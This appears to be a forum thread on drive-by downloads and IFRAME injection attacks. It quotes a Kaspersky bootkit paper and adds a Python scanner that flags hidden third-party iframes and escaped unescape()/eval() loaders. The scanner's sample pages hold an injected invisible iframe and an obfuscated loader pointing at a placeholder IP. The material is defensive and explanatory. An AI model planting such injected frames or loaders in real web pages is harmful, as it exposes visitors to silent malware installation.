
Browser hijacks, drive-by downloads, etc.



Some spam tries to get you to an exploited site (the fake "CNN Alerts", etc.). It seems sometimes it is just a 'placeholder', no actual website is linked (just practicing, reducing levels of caution, intended hack failed, domain registration still in progress, etc., etc.), sometimes an unwitting host has been alerted and has removed the offending page, but too many times "something" is lurking for the unwary or the overconfident. (Heh, congratulating yourself/gloating on your prescience in not okaying that "required codec" on offer while the real exploit silently does its stuff through some unpatched hole in your security is not a good look.)

Some of that stuff is described through the links at http://explabs.com/about/resCenter/video_library.asp (yeah, yeah, they'd like you to buy LinkScanner Pro and they have a vested interest in scaring you until you do but there's information on offer which is the point of what I'm saying).

Not to be confused with the websites of the fake watch peddlers, the pharms merchants and the like - they (mostly) just want your money, certainly your confirmed address too, occasionally your identity and the rest of your money and any other disposable assets. But not/hardly ever (yet) your computer, as such. That would be bad for business.

Forewarned is forearmed (ouch! ... no, no, the *other* forearmed). Sun Tzu reckoned if you didn't know your enemy you couldn't hope to win more than half the time. Make that "never" when the enemy, in fact, knows you and you don't know yourself/your environment. And they're more desperate than you.


I'd like to add that some exploits are really nasty. There was one on one of my regular wholesalers who got cracked that had an IFRAME injection script.

It was intelligent enough to detect that I was using Opera on Linux and sent a payload that tried to root my system!!!!!!!!! :o

(that Opera hole was plugged since, but still.... don't see many *nix capable exploits)



Further on the evolution of malware, a Kaspersky Lab Viruslist paper on the "bootkit", Bootkit: the challenge of 2008:

...The curious incident of the rebooting computers

In the middle of August, complaints started to appear on Internet forums from users who said their computers were rebooting themselves after a range of sites had been visited. What caused the reboot was unclear. There were no common factors found in the hardware and software used. Only a single possible explanation remained: the cause of the reboot had to be on the sites themselves.

An initial inspection of the suspicious sites revealed nothing – the sites appeared to be innocuous. In the majority of cases, malicious users who want to infect victim machines hack legitimate sites and place links to their resources which contain exploits on these sites. This technique is known as a "drive-by download"; when a user views the infected site, malicious code will be installed to the victim machine without the user's knowledge or consent. However, nothing was detected on this site – no suspicious iframes, no suspicious scripts. ...

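The two posts above (the IFRAME injection on the wholesaler's site, and the Kaspersky paper's "no suspicious iframes, no suspicious scripts" inspection) both come down to the same static check of a fetched page. The following is an added illustration of that check, not code from the thread or from Kaspersky: it flags invisible iframes that pull from a third-party host, and inline scripts that decode an escaped blob at run time (the usual shape of an injected loader). The page contents, host names and the escape-count threshold are constructed assumptions, and it is a heuristic, not a detector for the user-agent-gated exploit described in the post.

```python
"""Static scan of fetched HTML for drive-by injection patterns (added example)."""
import re
from html.parser import HTMLParser

MIN_ESCAPES = 10  # assumed threshold: how many %XX / \xXX escapes make a script suspect


class PageCollector(HTMLParser):
    """Collect every <iframe> with its attributes, and the text of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def _px(value):
    """Parse '0', '0px', ' 1 ' into an int; None if absent or not numeric."""
    m = re.match(r"\s*(-?\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else None


def suspicious_iframes(html, page_host):
    """Return iframes that are hidden (1px or smaller, display:none, visibility:hidden,
    pushed far off-screen) AND whose src is on a host other than page_host.
    Hidden same-site frames are common in legitimate pages, so they are not flagged."""
    p = PageCollector()
    p.feed(html)
    findings = []
    for f in p.iframes:
        src = f.get("src", "")
        m = re.match(r"^(?:https?:)?//([^/:?#]+)", src, re.I)
        host = m.group(1).lower() if m else page_host  # relative src -> same site
        if host == page_host:
            continue
        style = f.get("style", "").lower()
        reasons = []
        w, h = _px(f.get("width")), _px(f.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1) or \
                re.search(r"\b(width|height)\s*:\s*0+(px)?\s*(;|$)", style):
            reasons.append("zero-size")
        if re.search(r"display\s*:\s*none", style):
            reasons.append("display:none")
        if re.search(r"visibility\s*:\s*hidden", style):
            reasons.append("visibility:hidden")
        if re.search(r"\b(left|top)\s*:\s*-\d{3,}", style):
            reasons.append("off-screen")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


def suspicious_scripts(html):
    """Flag inline scripts that feed a heavily escaped string to unescape()/eval(),
    i.e. a loader that only reveals its iframe/script tag when the browser runs it."""
    p = PageCollector()
    p.feed(html)
    findings = []
    for s in p.scripts:
        escapes = len(re.findall(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}", s, re.I))
        if escapes >= MIN_ESCAPES and re.search(r"\b(unescape|eval)\s*\(", s):
            findings.append({"escapes": escapes, "snippet": s.strip()[:60]})
    return findings


# Constructed sample: a legitimate page with an injected invisible third-party frame.
INJECTED_PAGE = """<html><body><h1>Wholesale price list</h1>
<iframe src="http://203.0.113.7/in.cgi?3" width=0 height=0 frameborder=0></iframe>
</body></html>"""

# Constructed sample: the same injection hidden behind an unescape() loader.
OBFUSCATED_PAGE = """<html><body><script>document.write(unescape(
"%3Ciframe%20src%3D%22http%3A%2F%2F203.0.113.7%2Fin.cgi%3F3%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"
));</script></body></html>"""

# Constructed sample: benign page with a hidden same-site frame and a visible embed.
CLEAN_PAGE = """<html><body><script>var x = 1;</script>
<iframe src="/tracker.html" style="display:none"></iframe>
<iframe src="https://video.example.net/embed/1" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("obfuscated", OBFUSCATED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, suspicious_iframes(page, "shop.example.com"), suspicious_scripts(page))
```

Run it against the raw HTML you fetched (with a plain client, not a browser, so the page cannot run anything first). The obfuscated case is why the paper's "no suspicious iframes" finding is only the beginning: the frame is not in the markup at all until the script executes, so a markup-only scan must look at the scripts as well, and a script that assembles its payload from a different browser/OS fingerprint will still slip past both checks.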


